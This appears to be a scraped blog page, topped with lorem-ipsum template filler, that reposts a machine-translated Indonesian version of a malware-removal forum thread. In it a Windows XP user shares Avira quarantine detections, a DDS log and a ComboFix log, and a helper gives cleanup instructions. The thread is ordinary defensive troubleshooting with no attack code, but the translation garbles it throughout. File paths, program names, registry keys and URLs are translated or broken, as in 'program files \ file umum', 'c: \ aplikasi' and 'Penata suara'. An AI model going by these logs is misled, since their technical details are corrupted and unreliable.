Animasi n Sahring

Ads 468x60px

Giusto odio dignissimos

Giusto odio dignissimos

At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia...

Read More
Omnis dolor repellendus

Omnis dolor repellendus

At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia...

Read More
Olimpedit quo minus

Olimpedit quo minus

At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia...

Read More
Itaque earum rerum

Itaque earum rerum

At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia...

Read More
Epudiandae sint molestiae

Epudiandae sint molestiae

At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia...

Read More
Sahut aut reiciendis

Sahut aut reiciendis

At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia...

Read More

Kamis, 29 Maret 2012

Trojan / HTML Script Virus (Windows XP)

Trojan / HTML Script Virus (Windows XP)

Selama seminggu terakhir ini, Avira telah memperingatkan saya beberapa kali Trojan, namun juga bukan merupakan sistem Avira scan penuh, atau scan MBAM menemukan apa pun.

Saya telah diposting log DDS, dan melekat baik attach.txt dan ark.txt sebagai file. Zip.

Terima kasih telah meluangkan waktu untuk melihat.



Berikut adalah item di saya Avira karantina:
  • Berisi pengenalan pola dari appl / WinLock.A aplikasi C: \ Documents and Settings \ Steve \ Application Data \ dwlGina3.dll
  • Berisi pengenalan pola dari appl / WinLock.A aplikasi C: \ Documents and Settings \ Steve \ Local Settings \ Application Data \ dwlGina3.dll
  • Berisi pengenalan pola dari appl / WinLock.A aplikasi C: \ Documents and Settings \ Steve \ Local Settings \ Application Data \ dwlGina3.dll
  • Berisi pengenalan pola dari appl / WinLock.A aplikasi C: \ Documents and Settings \ Dan \ Application Data \ dwlGina3.dll
  • Berisi pengenalan pola virus HTML / Malicious.PDF.Gen script HTML C: \ Documents and Settings \ Steve \ Local Settings \ Temp \ Acr3B.tmp
  • Apakah TR / Trash.Gen Trojan C: \ System Volume Information \ _restore {1E827FEA-C1CA-4779-8180-5FD4C976D44A} \ RP281 \ A0068379.exe
  • Apakah TR / Trash.Gen Trojan C: \ System Volume Information \ _restore {1E827FEA-C1CA-4779-8180-5FD4C976D44A} \ RP281 \ A0068380.exe
  • Apakah TR / Trash.Gen Trojan C: \ System Volume Information \ _restore {1E827FEA-C1CA-4779-8180-5FD4C976D44A} \ RP281 \ A0068381.exe
  • Apakah TR / Trash.Gen Trojan C: \ System Volume Information \ _restore {1E827FEA-C1CA-4779-8180-5FD4C976D44A} \ RP281 \ A0068382.exe
  • Apakah TR / Trash.Gen Trojan C: \ System Volume Information \ _restore {1E827FEA-C1CA-4779-8180-5FD4C976D44A} \ RP281 \ A0068383.exe
  • Apakah TR / Trash.Gen Trojan C: \ System Volume Information \ _restore {1E827FEA-C1CA-4779-8180-5FD4C976D44A} \ RP281 \ A0068384.exe
  • Apakah TR / Trash.Gen Trojan C: \ System Volume Information \ _restore {1E827FEA-C1CA-4779-8180-5FD4C976D44A} \ RP281 \ A0068385.exe
  • Apakah TR / Trash.Gen Trojan C: \ System Volume Information \ _restore {1E827FEA-C1CA-4779-8180-5FD4C976D44A} \ RP281 \ A0068386.exe
  • Berisi pengenalan pola EXP / Pidief.akx mengeksploitasi C: \ Documents and Settings \ Steve \ Local Settings \ Temp \ plugtmp-1 \ 1ddfp.php plugin-


Berikut ini saya log DDS:
.
DDS (Ver_2011-08-26,01) - NTFSx86
Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 1.6.0_29
Jalankan oleh Dan di 16:00:28 pada 2011/11/09
Microsoft Windows XP Home Edition 5.1.2600.3.1252.44.1033.18.447.182 [GMT 0:00]
.
AV: AntiVir Desktop * Diaktifkan / Diperbarui * {AD166499-45F9-482A-A743-FDD3350758C7}
.
============== Menjalankan Proses ===============
.
C: \ WINDOWS \ system32 \ Ati2evxx.exe
C: \ WINDOWS \ system32 \ svchost-k DcomLaunch
svchost.exe
C: \ WINDOWS \ System32 \ svchost.exe-k netsvcs
svchost.exe
svchost.exe
C: \ WINDOWS \ system32 \ spoolsv.exe
C: \ Program Files \ Avira \ AntiVir Desktop \ sched.exe
svchost.exe
C: \ Program Files \ Avira \ AntiVir Desktop \ avguard.exe
C: \ Program Files \ Common Files \ Apple \ Dukungan Mobile Device \ AppleMobileDeviceService.exe
C: \ Program Files \ Bonjour \ EXE
c: \ APPS \ PowerCinema \ Kernel \ TV \ CLCapSvc.exe
c: \ APPS \ PowerCinema \ Kernel \ CLML_NTService \ CLMLServer.exe
C: \ Program Files \ Avira \ AntiVir Desktop \ avshadow.exe
C: \ Program Files \ Java \ jre6 \ bin \ jqs.exe
C: \ WINDOWS \ system32 \ svchost.exe-k imgsvc
C: \ Program Files \ Sonic \ DigitalMedia LE v7 \ MyDVD LE \ USBDeviceService.exe
c: \ APPS \ PowerCinema \ Kernel \ TV \ CLSched.exe
C: \ WINDOWS \ System32 \ svchost.exe-k HTTPFilter
C: \ WINDOWS \ system32 \ Ati2evxx.exe
C: \ WINDOWS \ Explorer.exe
C: \ WINDOWS \ SOUNDMAN.EXE
C: \ APPS \ PowerCinema \ PCMService.exe
C: \ Program Files \ Sonic \ DigitalMedia LE v7 \ MyDVD LE \ DetectorApp.exe
C: \ Program Files \ Common Files \ InstallShield \ updateservice \ issch.exe
C: \ WINDOWS \ system32 \ wuauclt.exe
C: \ PROGRA ~ 1 \ GOTOSO ~ 1 \ VADERE ~ 1 \ Vaderetro_oe.exe
C: \ Program Files \ Avira \ AntiVir Desktop \ avgnt.exe
C: \ Program Files \ Common Files \ Java \ Java Pembaruan \ jusched.exe
C: \ WINDOWS \ system32 \ ctfmon.exe
C: \ WINDOWS \ system32 \ notepad.exe
C: \ Documents and Settings \ Dan \ Desktop \ dds.scr
.
============== Pseudo HJT Laporan ===============
.
uStart Halaman = sekitar : Kosong
mDefault_Page_URL = hxxp :/ / www.yahoo.com/?ilc=8
mStart Halaman = hxxp :/ / www.yahoo.com/?ilc=8
Pengaturan uInternet, ProxyOverride = *. lokal
BHO: {02478D38-C3F9-4efb-9B51-7695ECA05670} - Tidak Ada File
BHO: Kelas AcroIEHlprObj: {06849e9f-c8d7-4d59-b87d-784b7d6be0b3} - c: \ program files \ adobe \ acrobat 7.0 \ ActiveX \ AcroIEHelper.dll
BHO: {5C255C8A-E604-49b4-9D64-90988571CECB} - Tidak Ada File
BHO: Windows Live Sign-in Helper: {9030d464-4c02-4abf-8ecc-5164760863c6} - c: \ program files \ file umum \ microsoft shared \ windows live \ WindowsLiveLogin.dll
BHO: Java (tm) Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c: \ program files \ java \ jre6 \ bin \ jp2ssv.dll
BHO: JQSIEStartDetectorImpl Kelas: {e7e6f031-17ce-4c07-bc86-eabfe594f69c} - c: \ program files \ java \ jre6 \ lib \ menyebarkan \ jqs \ yaitu \ jqs_plugin.dll
BHO: {FDAD4DA1-61A2-4FD8-9C17-86F7AC245081} - Tidak Ada File
TB: {EF99BD32-C1FB-11D2-892F-0090271D4F88} - Tidak Ada File
TB: {0B53EAC3-8D69-4B9E-9B19-A37C9A5676A7} - Tidak Ada File
EB: Real.com: {fe54fa40-d68c-11d2-98fa-00c0f0318afe} - c: \ windows \ system32 \ shdocvw.dll
uRun: [CCleaner] "c: \ program files \ CCleaner \ CCleaner.exe" / AUTO
uRun: [ctfmon.exe] c: \ windows \ system32 \ ctfmon.exe
mRun: [soundman] SOUNDMAN.EXE
mRun: [PCMService] "c: \ aplikasi \ PowerCinema \ PCMService.exe"
mRun: [DetectorApp] c: \ program files \ sonik \ digitalmedia le v7 \ mydvd le \ DetectorApp.exe
mRun: [ISUSPM Startup] c: \ progra ~ 1 \ umum ~ 1 \ instal ~ 1 \ pembaruan ~ 1 \ ISUSPM.exe-startup
mRun: [ISUSScheduler] "c: \ program files \ file umum \ InstallShield \ updateservice \ issch.exe"-start
mRun: [Vade Retro Outlook Express] "c: \ progra ~ 1 \ gotoso ~ 1 \ vadere ~ 1 \ Vaderetro_oe.exe"
mRun: [avgnt] "c: \ program files \ avira \ AntiVir Desktop \ avgnt.exe" / menit
mRun: [SunJavaUpdateSched] "c: \ program files \ file umum \ java \ java update \ jusched.exe"
dRun: [ctfmon.exe] c: \ windows \ system32 \ ctfmon.exe
IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} -% windir% \ Jaringan Diagnostik \ xpnetdiag.exe
IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c: \ program files \ utusan \ msmsgs.exe
IE: {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - {FE54FA40-D68C-11d2-98FA-00C0F0318AFE} - c: \ windows \ system32 \ shdocvw.dll
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp :/ / java.sun.com/update/1.6.0/jinstall-1_6_0_29-windows-i586.cab
DPF: {CAFEEFAC-0015-0000-0004-ABCDEFFEDCBA} - hxxp :/ / java.sun.com/update/1.5.0/jinstall-1_5_0_04-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0029-ABCDEFFEDCBA} - hxxp :/ / java.sun.com/update/1.6.0/jinstall-1_6_0_29-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp :/ / java.sun.com/update/1.6.0/jinstall-1_6_0_29-windows-i586.cab
TCP: DhcpNameServer = 192.168.0.1
TCP: Antarmuka \ {F9F330CE-AFF2-4E0E-9E59-E25077BFCC77}: DhcpNameServer = 192.168.0.1
Beritahu: AtiExtEvent - Ati2evxx.dll
SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c: \ windows \ system32 \ WPDShServiceObj.dll
Host: 127.0.0.1 www.spywareinfo.com
.
================= FIREFOX ===================
.
FF - ProfilePath - c: \ Documents and Settings \ Dan \ aplikasi data \ mozilla \ firefox \ profiles \ 2cqiyjwl.default \
.
============= LAYANAN / DRIVER ===============
.
R1 avgio; avgio c: \ program files \ avira \ AntiVir Desktop \ avgio.sys [2010/11/03 11608]
R2 AntiVirSchedulerService; Avira AntiVir Penjadwal c: \ program files \ avira \ AntiVir Desktop \ sched.exe [2010/11/03 136.360]
R2 AntiVirService; Avira AntiVir Garda c: \ program files \ avira \ AntiVir Desktop \ avguard.exe [2010/11/03 269.480]
R2 avgntflt; avgntflt c: \ windows \ system32 \ drivers \ avgntflt.sys [2010/11/03 66616]
Clr_optimization_v4.0.30319_32 S2, Microsoft NET Framework NGEN v4.0.30319_X86 c:. \ Windows \ microsoft.net \ kerangka \ v4.0.30319 \ mscorsvw.exe [2010/03/18 130.384]
S3 Lavasoft Kernexplorer; Lavasoft pembantu pengemudi; \ \ c:? -: [?] \ Program files \ Lavasoft \ ad-aware \ kernexplorer.sys> c \ program files \ Lavasoft \ ad-aware \ KernExplorer.sys
S3 WinRM; Windows Remote Management (WS-Management); c: \ windows \ system32 \ svchost.exe-k WinRM [2006/09/05 14336]
S3 WPFFontCache_v0400; Windows Presentation Foundation Font Cache 4.0.0.0 c: \ windows \ microsoft.net \ kerangka \ v4.0.30319 \ WPF \ WPFFontCache_v0400.exe [2010/03/18 753.504]
.
=============== Dibuat 30 terakhir ================
.
2011/11/09 15:17:38 -------- d - h - r-c: \ Documents and Settings \ Dan \ terbaru
2011/11/04 19:57:55 -------- d ----- w-c: \ program files \ Realtek AC97
.
==================== Find3M ====================
.
2011/10/17 11:07:35 414.368 ---- aw-c: \ windows \ system32 \ FlashPlayerCPLApp.cpl
2011-10-03 04 03 472808 ---- aw-c: \ windows \ system32 \ deployJava1.dll
2011/10/03 01:37:52 73728 ---- aw-c: \ windows \ system32 \ javacpl.cpl
2011/09/26 10:41:20 611.328 ---- aw-c: \ windows \ system32 \ uiautomationcore.dll
2011/09/26 10:41:20 220.160 ---- aw-c: \ windows \ system32 \ oleacc.dll
2011/09/26 10:41:14 20480 ---- aw-c: \ windows \ system32 \ oleaccrc.dll
2011/09/22 10:36:23 101.720 ---- aw-c: \ windows \ system32 \ drivers \ SBREDrv.sys
2011/09/09 09:12:13 599.040 ---- aw-c: \ windows \ system32 \ crypt32.dll
2011/09/06 13:20:51 1.858.944 ---- aw-c: \ windows \ system32 \ win32k.sys
2011/08/31 16:00:50 22216 ---- aw-c: \ windows \ system32 \ drivers \ mbam.sys
2011/08/22 23:48:55 916.480 ---- aw-c: \ windows \ system32 \ wininet.dll
2011/08/22 23:48:54 43.520 ------ w-c: \ windows \ system32 \ licmgr10.dll
2011/08/22 23:48:54 1.469.440 ------ w-c: \ windows \ system32 \ inetcpl.cpl
2011/08/22 11:56:39 385.024 ---- aw-c: \ windows \ system32 \ html.iec
2011/08/17 13:49:54 138.496 ---- aw-c: \ windows \ system32 \ drivers \ afd.sys
.
============= FINISH: 16:01:38.46 ===============
 
Re: Trojan / Virus Script HTML (Windows XP)
Halo HertsMan123. Mari kita lihat apakah ComboFix menemukan apa-apa.

-------------------------------------------------- ----

Harap tetap dengan saya sampai diberi 'semua jelas' bahkan jika gejala yang tampaknya mereda.

Mohon ikuti petunjuk saya dan silahkan lakukan tidak memperbaiki sendiri atau menjalankan scanner kecuali diminta oleh penolong.

-------------------------------------------------- ----

Jika ada file pribadi, pics, dll pada komputer Anda, Anda tidak bisa hidup tanpa, kembali mereka sekarang hanya sebagai pencegahan.

Cadangan Darurat Prosedur - Forum Tech Support

-------------------------------------------------- ----

Silakan kunjungi halaman web untuk link download, dan petunjuk untuk menjalankan ComboFix:

Sebuah panduan dan tutorial tentang cara menggunakan ComboFix

* Pastikan Anda telah menonaktifkan semua program antivirus dan antimalware sehingga mereka tidak mengganggu jalannya ComboFix.

Mendapatkan bantuan di sini

Silahkan posting C: \ ComboFix.txt dalam balasan Anda berikutnya untuk diperiksa lebih lanjut.

Silahkan mengaktifkan kembali antivirus anda sebelum posting log ComboFix.txt. 


Re: Trojan / Virus Script HTML (Windows XP)
ComboFix Login di bawah. Aku membuka Avira untuk menonaktifkan Anti Virus, dan mengatakan Menonaktifkan, namun ketika saya berlari ComboFix pesan muncul mengatakan AntiVirus itu masih berjalan, tapi itu scan akan berlanjut.
Setelah ComboFix telah menjalankan scan, sebuah shortcut Internet Explorer muncul di desktop saya.
Lag masih terjadi.

Terima kasih :)


ComboFix 11-11-14.02 - Dan 14/11/2011 18:12:38.1.1 - x86
Microsoft Windows XP Home Edition 5.1.2600.3.1252.44.1033.18.447.247 [GMT 0:00]
Menjalankan dari: c: \ Documents and Settings \ Dana \ Desktop \ ComboFix.exe
AV: AntiVir Desktop * Diaktifkan / Diperbarui * {AD166499-45F9-482A-A743-FDD3350758C7}
.
.
(((((((((((((((((((((((((((((((((((((((Penghapusan lain))))))))) ))))))))))))))))))))))))))))))))))))))))
.
.
c: \ Documents and Settings \ Administrator \ WINDOWS
c: \ Documents and Settings \ All Users \ Application Data \ Tarma Installer
c: \ Documents and Settings \ All Users \ Application Data \ Tarma Installer \ {D6B25B8D-0566-42B1-A23D-7576138435D6} \ _Setup.dll
c: \ Documents and Settings \ All Users \ Application Data \ Tarma Installer \ {D6B25B8D-0566-42B1-A23D-7576138435D6} \ Setup.dat
c: \ Documents and Settings \ All Users \ Application Data \ Tarma Installer \ {D6B25B8D-0566-42B1-A23D-7576138435D6} \ Setup.exe
c: \ Documents and Settings \ All Users \ Application Data \ Tarma Installer \ {D6B25B8D-0566-42B1-A23D-7576138435D6} \ Setup.ico
c: \ Documents and Settings \ Dan \ WINDOWS
c: \ Documents and Settings \ Default User \ WINDOWS
c: \ Documents and Settings \ Steve \ Local Settings \ Application Data \ uk6.exe
c: \ Documents and Settings \ Steve \ Local Settings \ Application Data \ uk66.exe
c: \ Documents and Settings \ Steve \ WINDOWS
C: \ install.exe
c: \ windows \ system32 \ config \ systemprofile \ WINDOWS
.
.
(((((((((((((((((((((((((File Dibuat dari 2011/10/14 ke 2011-11-14))))))))))) ))))))))))))))))))))
.
.
2011/11/14 16:24. 2011/11/14 18:30 -------- d ----- w-c: \ Documents and Settings \ Administrator
2011/11/04 19:57. 2011/11/04 19:58 -------- d ----- w-c: \ program files \ Realtek AC97
2011/11/04 16:17. 2011/11/04 16:17 -------- d ----- w-c: \ Documents and Settings \ New Folder
.
.
.
((((((((((((((((((((((((((((((((((((((((Find3M Laporan)))))))) ))))))))))))))))))))))))))))))))))))))))))))
.
2011/11/13 09:10. 2011/08/28 16:11 414.368 ---- aw-c: \ windows \ system32 \ FlashPlayerCPLApp.cpl
2011/10/10 14:22. 2006/08/27 19:30 692.736 ---- aw-c: \ windows \ system32 \ inetcomm.dll
2011/10/03 04:06. 2010-11-02 22:19 472.808 ---- aw-c: \ windows \ system32 \ deployJava1.dll
2011/10/03 01:37. 2011/07/01 19:00 73728 ---- aw-c: \ windows \ system32 \ javacpl.cpl
2011/09/28 07:06. 2006/09/05 14:50 599.040 ---- aw-c: \ windows \ system32 \ crypt32.dll
2011/09/26 10:41. 2008-07-29 19:59 611.328 ---- aw-c: \ windows \ system32 \ uiautomationcore.dll
2011/09/26 10:41. 2006/09/05 14:56 220.160 ---- aw-c: \ windows \ system32 \ oleacc.dll
2011/09/26 10:41. 2006/09/05 14:56 20.480 ---- aw-c: \ windows \ system32 \ oleaccrc.dll
2011/09/22 10:36. 2011/03/17 09:50 101.720 ---- aw-c: \ windows \ system32 \ drivers \ SBREDrv.sys
2011/09/06 13:20. 2006-08-28 3:19 1.858.944 ---- aw-c: \ windows \ system32 \ win32k.sys
2011/08/31 16:00. 2010-11-03 21:33 22216 ---- aw-c: \ windows \ system32 \ drivers \ mbam.sys
2011/08/22 23:48. 2006-08-28 03:19 916.480 ---- aw-c: \ windows \ system32 \ wininet.dll
2011/08/22 23:48. 2006/09/05 14:54 43.520 ------ w-c: \ windows \ system32 \ licmgr10.dll
2011/08/22 23:48. 2006/09/05 14:52 1.469.440 ------ w-c: \ windows \ system32 \ inetcpl.cpl
2011/08/22 11:56. 2006/09/05 14:52 385.024 ---- aw-c: \ windows \ system32 \ html.iec
2011/08/17 13:49. 2006/09/05 14:49 138.496 ---- aw-c: \ windows \ system32 \ drivers \ afd.sys
.
.
(((((((((((((((((((((((((((((((((((((Reg Poin Memuat)))))))))) ))))))))))))))))))))))))))))))))))))))))
.
.
* Catatan * entri kosong & entri standar legit tidak ditampilkan
REGEDIT4
.
[HKEY_CURRENT_USER \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run]
"CCleaner" = "c: \ program files \ CCleaner \ CCleaner.exe" [2011/07/25 2585408]
.
[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run]
"Penata suara" = "SOUNDMAN.EXE" [2007/04/16 577.536]
"PCMService" = "c: \ aplikasi \ PowerCinema \ PCMService.exe" [2006/02/23 147.456]
"DetectorApp" = "c: \ program files \ Sonic \ DigitalMedia LE v7 \ MyDVD LE \ DetectorApp.exe" [2005/10/20 102400]
"ISUSPM Startup" = "c: \ progra ~ 1 \ UMUM ~ 1 \ instal ~ 1 \ UPDATE ~ 1 \ ISUSPM.exe" [2004-07-27 221.184]
"ISUSScheduler" = "c: \ program files \ Common Files \ InstallShield \ updateservice \ issch.exe" [2004-07-27 81920]
"Vade Retro Outlook Express" = "c: \ progra ~ 1 \ GOTOSO ~ 1 \ VADERE ~ 1 \ Vaderetro_oe.exe" [2004/10/04 310.272]
"Avgnt" = "c: \ program files \ Avira \ AntiVir Desktop \ avgnt.exe" [2010-08-02 281.768]
"SunJavaUpdateSched" = "c: \ program files \ Common Files \ Java \ Java Pembaruan \ jusched.exe" [2011/06/09 254.696]
.
[HKEY_USERS \ DEFAULT \ Software \ Microsoft. \ Windows \ CurrentVersion \ Run]
"Ctfmon.exe" = "c: \ windows \ system32 \ ctfmon.exe" [2008/04/14 15360]
.
[HKLM \ ~ \ startupfolder \ C: Documents and Settings ^ ^ ^ Semua Pengguna Start Menu ^ ^ Program Startup ^ Adobe Reader Kecepatan Launch.lnk]
path = c: \ Documents and Settings \ All Users \ Start Menu \ Programs \ Startup \ Adobe Reader Kecepatan Launch.lnk
cadangan = c: \ windows \ PSS \ Adobe Reader Kecepatan Launch.lnkCommon Startup
.
[HKLM \ ~ \ startupfolder \ C: Documents and Settings ^ ^ ^ Dan Start Menu ^ ^ Program Startup ^ EvernoteClipper.lnk]
path = c: \ Documents and Settings \ Dan \ Start Menu \ Programs \ Startup \ EvernoteClipper.lnk
cadangan = c: \ windows \ PSS \ EvernoteClipper.lnkStartup
.
[HKEY_LOCAL_MACHINE \ software \ microsoft \ shared tools \ msconfig \ startupreg \ Messenger (Yahoo!)]
2009-05-26 20:06 4.351.216 ---- aw-c: \ program files \ Yahoo! \ Messenger \ yahoomessenger.exe
.
[HKEY_LOCAL_MACHINE \ software \ microsoft \ shared tools \ msconfig \ startupreg \ QuickTime Task]
2010-11-29 17:38 421.888 ---- aw-c: \ program files \ QuickTime \ QTTask.exe
.
[HKEY_LOCAL_MACHINE \ software \ microsoft \ shared tools \ msconfig \ startupreg \ RealTray]
2006/08/27 20:28 26112-c - aw-c: \ program files \ Estat \ RealPlayer \ realplay.exe
.
[HKEY_LOCAL_MACHINE \ software \ microsoft \ shared tools \ msconfig \ startupreg \ Recguard]
2002/09/13 20:42 212992-c - aw-c: \ windows \ SMINST \ Recguard.exe
.
[HKEY_LOCAL_MACHINE \ software \ microsoft \ shared tools \ msconfig \ startupreg \ RIMBBLaunchAgent.exe]
2011-02-18 10:47 79192-c - aw-c: \ program files \ Common Files \ Research In Motion \ USB Driver \ RIMBBLaunchAgent.exe
.
[HKEY_LOCAL_MACHINE \ software \ microsoft \ shared tools \ msconfig \ startupreg \ Yahoo! Pager]
2009-05-26 20:06 4.351.216 ---- aw-c: \ program files \ Yahoo! \ Messenger \ yahoomessenger.exe
.
[HKLM \ ~ \ jasa \ sharedaccess \ parameters \ firewallpolicy \ standardprofile \ AuthorizedApplications \ Daftar]
"% Windir% \ \ system32 \ \ sessmgr.exe" =
"C: \ \ APPS \ \ PowerCinema \ \ PowerCinema.exe" =
"C: \ \ APPS \ \ PowerCinema \ \ PCMService.exe" =
"C: \ \ Program Files \ \ Yahoo! \ \ Messenger \ \ yahoomessenger.exe" =
"C: \ \ Program Files \ \ Messenger \ \ msmsgs.exe" =
"% Windir% \ \ Jaringan Diagnostik \ \ xpnetdiag.exe" =
"C: \ \ Program Files \ \ Windows Live \ \ Messenger \ \ wlcsdk.exe" =
"C: \ \ Program Files \ \ Windows Live \ \ Messenger \ \ msnmsgr.exe" =
"C: \ \ Program Files \ \ Bonjour \ \ EXE" =
"C: \ \ Program Files \ \ Mozilla Firefox \ \ firefox.exe" =
"C: \ \ Program Files \ \ Research In Motion \ \ BlackBerry Desktop \ \ Rim.Desktop.exe" =
.
[HKLM \ ~ \ jasa \ sharedaccess \ parameters \ firewallpolicy \ standardprofile \ GloballyOpenPorts \ Daftar]
"5985: TCP" = 5985: TCP: *: diaktifkan: Windows Remote Management
.
R2 AntiVirSchedulerService; Avira AntiVir Penjadwal c: \ program files \ Avira \ AntiVir Desktop \ sched.exe [2011/04/27 136.360]
R2 clr_optimization_v4.0.30319_32; Microsoft NET Framework NGEN v4.0.30319_X86 c:. \ Windows \ Microsoft.NET \ Framework \ v4.0.30319 \ mscorsvw.exe [2010-03-18 130.384]
R3 Lavasoft Kernexplorer; Lavasoft sopir pembantu; c: \ program files \ Lavasoft \ Ad-Aware \ KernExplorer.sys [x]
R3 WPFFontCache_v0400; Windows Presentation Foundation Cache font 4.0.0.0 c: \ windows \ Microsoft.NET \ Framework \ v4.0.30319 \ WPF \ WPFFontCache_v0400.exe [2010-03-18 753.504]
.
.
[HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows NT \ CurrentVersion \ svchost]
WinRM REG_MULTI_SZ WinRM
.
Isi folder 'Scheduled Tasks'
.
2011/11/12 c: \ windows \ Tasks \ AppleSoftwareUpdate.job
- C: \ program files \ Apple Software Update \ SoftwareUpdate.exe [2009-10-22 11:50]
.
.
Pindai Tambahan ------- -------
.
uStart Halaman = sekitar : Kosong
mStart Halaman = hxxp :/ / www.yahoo.com/?ilc=8
Pengaturan uInternet, ProxyOverride = *. lokal
TCP: DhcpNameServer = 192.168.0.1
FF - ProfilePath - c: \ Documents and Settings \ Dan \ Application Data \ Mozilla \ Firefox \ Profiles \ 2cqiyjwl.default \
FF - prefs.js: browser.startup.homepage - sekitar : Kosong
FF - Ext: Default: {972ce4c6-7e08-4474-a285-3208198ce6fd} - c: \ program files \ Mozilla Firefox \ extensions \ {972ce4c6-7e08-4474-a285-3208198ce6fd}
FF - Ext: Java Console: {CAFEEFAC-0016-0000-0022-ABCDEFFEDCBA} - c: \ program files \ Mozilla Firefox \ extensions \ {CAFEEFAC-0016-0000-0022-ABCDEFFEDCBA}
FF - Ext: Java Console: {CAFEEFAC-0016-0000-0023-ABCDEFFEDCBA} - c: \ program files \ Mozilla Firefox \ extensions \ {CAFEEFAC-0016-0000-0023-ABCDEFFEDCBA}
FF - Ext: Java Console: {CAFEEFAC-0016-0000-0024-ABCDEFFEDCBA} - c: \ program files \ Mozilla Firefox \ extensions \ {CAFEEFAC-0016-0000-0024-ABCDEFFEDCBA}
FF - Ext: Java Console: {CAFEEFAC-0016-0000-0026-ABCDEFFEDCBA} - c: \ program files \ Mozilla Firefox \ extensions \ {CAFEEFAC-0016-0000-0026-ABCDEFFEDCBA}
FF - Ext: Java Console: {CAFEEFAC-0016-0000-0029-ABCDEFFEDCBA} - c: \ program files \ Mozilla Firefox \ extensions \ {CAFEEFAC-0016-0000-0029-ABCDEFFEDCBA}
FF - Ext: pdf download: {37E4D8EA-8BDA-4831-8EA1-89053939A250} -%% profil \ extensions \ {37E4D8EA-8BDA-4831-8EA1-89053939A250}
FF - Ext: Flashblock: {3d7eb24f-2740-49df-8937-200b1cc08f8a} -%% profil \ extensions \ {3d7eb24f-2740-49df-8937-200b1cc08f8a}
FF - Ext: NoScript: {73a6fe31-595d-460b-A920-fcc0f8843232} -%% profil \ extensions \ {73a6fe31-595d-460b-A920-fcc0f8843232}
FF - Ext: DownloadHelper: {b9db16a4-6edc-47ec-a1f4-b86292ed211d} -%% profil \ extensions \ {b9db16a4-6edc-47ec-a1f4-b86292ed211d}
FF - Ext: Adblock Plus: {d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d} - profil%% \ extensions \ {d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}
FF - Ext: Download Statusbar: {D4DD63FA-01E4-46a7-B6B1-EDAB7D6AD389} -%% profil \ extensions \ {D4DD63FA-01E4-46a7-B6B1-EDAB7D6AD389}
FF - Ext: Pixlr Grabber: {d47a9f51-8281-43fa-f450-f28ef8735e9a} -%% profil \ extensions \ {d47a9f51-8281-43fa-f450-f28ef8735e9a}
FF - Ext: Microsoft Kerangka Asisten NET: {20a82645-c095-46ed-80e3-08825760534b} - c:. \ Windows \ Microsoft.NET \ Framework \ v3.5 \ Windows Presentation Foundation \ DotNetAssistantExtension
FF - Ext: Jawa Cepat Starter: jqs@sun.com - c: \ program files \ Java \ jre6 \ lib \ menyebarkan \ jqs \ ff
.
ANAK YATIM ---- DIHAPUS ----
.
SafeBoot-Wdf01000.sys
MSConfigStartUp-BlackBerryAutoUpdate - c: \ program files \ Common Files \ Research In Motion \ Auto Update \ RIMAutoUpdate.exe
MSConfigStartUp-iTunesHelper - c: \ program files \ iTunes \ iTunesHelper.exe
MSConfigStartUp-MsnMsgr - c: \ program files \ MSN Messenger \ msnmsgr.exe
AddRemove-{D6B25B8D-0566-42B1-A23D-7576138435D6} - c: \ DOCUME ~ 1 \ ALLUSE ~ 1 \ applic ~ 1 \ TARMAI ~ 1 \ {D6B25 ~ 1 \ Setup.exe
.
.
.
************************************************** ************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit / siluman detektor malware dengan GMER, GMER - Rootkit Detector dan Remover
Rootkit Scan 2011/11/14 18:33
Jendela 5.1.2600 Service Pack 3 NTFS
.
scanning proses tersembunyi ...
.
pemindaian entri autostart tersembunyi ...
.
pemindaian file yang tersembunyi ...
.
memindai selesai dengan sukses
hidden file: 0
.
************************************************** ************************
.
--------------------- DLL Loaded Dalam Menjalankan Proses ---------------------
.
-------> 'Winlogon.exe' (696)
c: \ windows \ system32 \ Ati2evxx.dll
.
Penyelesaian waktu: 2011/11/14 18:44:27
ComboFix-dikarantina-files.txt 2011/11/14 18:44
.
Pra-Run: 58004619264 bytes bebas
Pasca-Run: 57957384192 bytes bebas
.
WindowsXP-KB310994-SP2-Home-bootdisk-ENU.exe
[Boot loader]
timeout = 2
default = multi (0) disk (0) rdisk (0) partisi (1) \ WINDOWS
[Sistem operasi]
c: \ cmdcons \ BOOTSECT.DAT = "Microsoft Windows Recovery Console" / cmdcons
UnsupportedDebug = "tidak memilih ini" / debug
multi (0) disk (0) rdisk (0) partisi (1) \ WINDOWS = "Microsoft Windows XP Home Edition" / noexecute = optin / fastdetect
.
